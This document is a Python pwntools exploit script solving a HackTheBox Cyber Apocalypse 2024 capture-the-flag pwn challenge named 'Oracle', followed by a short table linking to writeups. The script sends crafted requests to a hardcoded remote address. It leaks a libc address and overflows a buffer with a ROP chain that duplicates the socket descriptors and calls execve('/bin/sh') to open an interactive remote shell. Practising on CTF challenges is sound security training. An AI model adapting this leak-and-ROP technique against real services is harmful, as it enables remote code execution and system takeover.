#!/usr/bin/env python3
"""
Hackthebox Cyber Apocalypse 2024
Pwn - Oracle
"""
from pwn import *
e = ELF("./oracle_patched")
libc = ELF("./libc-2.31.so")
context.binary = e
context.log_level = "DEBUG"
context.terminal = ['qterminal', '-e', 'sh', '-c']
# Primitive Shortcut
ru = lambda a: p.readuntil(a)
r = lambda n: p.read(n)
rl = lambda : p.recvline()
sla = lambda a,b: p.sendlineafter(a,b)
sa = lambda a,b: p.sendafter(a,b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
def get_con():
# host = "localhost"
# port = 9001
host = "94.237.50.175"
port = 38001
p = remote(host, port)
return p
def main():
global p
p = get_con()
# Trigger free
EOL = b"\r\n"
header = b""
header += b"Content-Length: "+ b"1000" +EOL
header += b"Plague-Target: a"+EOL
packet = b""
packet += b"PLAGUE xxx 1\r\n\r\n"
packet += header
packet += EOL+EOL
sl(packet)
# leak libc
print("alive2")
p = get_con()
sl(packet)
ru(b"Attempted plague: ")
rl()
rl()
leak = u64(r(20)[5:5+8])
libc.address = leak - 2018272
print(f"Leak: {hex(leak)}")
print(f"libc: {hex(libc.address)}")
print("gg")
# dup fd and exce
binsh = next(libc.search(b"/bin/sh"))
rop = ROP(libc)
rop.call('dup2', [6,0])
rop.call('dup2', [6,1])
rop.call('dup2', [6,2])
rop.rdi = binsh
rop.rsi = 0
rop.rsi = 0 # align stack
rop.rdx = 0
rop.raw(libc.sym.execve)
print(rop.dump())
p = get_con()
payload = b"VsIEW "
payload += b"A"*3114 # Padding
payload += b"BBBBBBBB"
payload += b"CCCCCCCC"
payload += b"DDDDDDDD"
payload += b"EEEEEEE"
payload += rop.chain() # RIP
payload += b"X"*(4000 - len(payload))
payload += b" 1\r\n\r\n" # Action, target_competitor, and version
payload += b"Content-Length: "+ b"1000" +EOL
payload += EOL+EOL
sl(payload)
p.interactive()
if __name__ == "__main__":
main()
| Action | Rating | Author team |
|---|---|---|
| Read writeup |
not rated
|
Fidethus |
| Read writeup |
not rated
|
#C0FFEE |
